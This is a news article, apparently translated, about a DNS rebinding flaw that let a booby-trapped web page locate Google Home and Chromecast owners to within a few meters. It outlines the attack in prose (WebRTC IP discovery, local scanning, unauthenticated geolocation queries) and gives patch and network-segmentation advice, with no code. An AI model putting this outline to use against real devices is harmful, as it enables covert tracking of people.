Here is a new example of the risks associated with a misconfigured connected devices, an area where even Google makes mistakes. Suppose a user is quietly at home surfing the web. This user also has a Google Home or Chromecast connected to their local network. Security researcher Craig Young of Tripwire discovered that it was enough to take this user on a website trapped to reveal its location with an accuracy of a few meters. Worrying? no?
This information leak is explained by a bad design of the parameterization functions. Google’s connected devices can indeed be configured from the local network, using the mobile home application installed on a smartphone. But connections are made with a low level of security, in HTTP and without any authentication. A browser running on a computer connected to the local network could therefore easily pretend to be the home application and send queries to Google devices.
Attack by DNS Rebinding
That’s exactly what the Craig Young website does. Equipped with a malicious Javascript code hidden in an iframe, this trapped page will first retrieve the local IP address of the computer using the WebRTC API. It will then browse the various possible local IP addresses and send them geolocation requests. As you can see in a YouTube video, it only takes a few minutes to recover this information, which is all the more accurate as Google relies on a database of Wi-Fi access points to do triangulation.
This hack is based on a well-known technique called “DNS Rebinding”. It is a sleight of hand that allows you to execute a Javascript code not on the server of the trapped website, but on a local web server. All the attacker needs to do is to have a DNS server which, when resolving the domain name, will first point to the hacker’s web server to retrieve the Javascript code, then on a local address to execute code.
According to the KrebsOnSecurity site, Google has taken note of this security breach and intends to deploy a patch in mid-July. Until then, users of Google Home and Chromecast have an interest in not surfing on shady sites. Another way to protect yourself and buy a second Wi-Fi hotspot and connect your WAN port to one of the Internet box’s LAN ports. We then have two wireless networks – one to surf the web, the other to connect to connected objects. This partitioning will prevent requests sent by the browser to reach these devices. It is a little painful, but much more secure.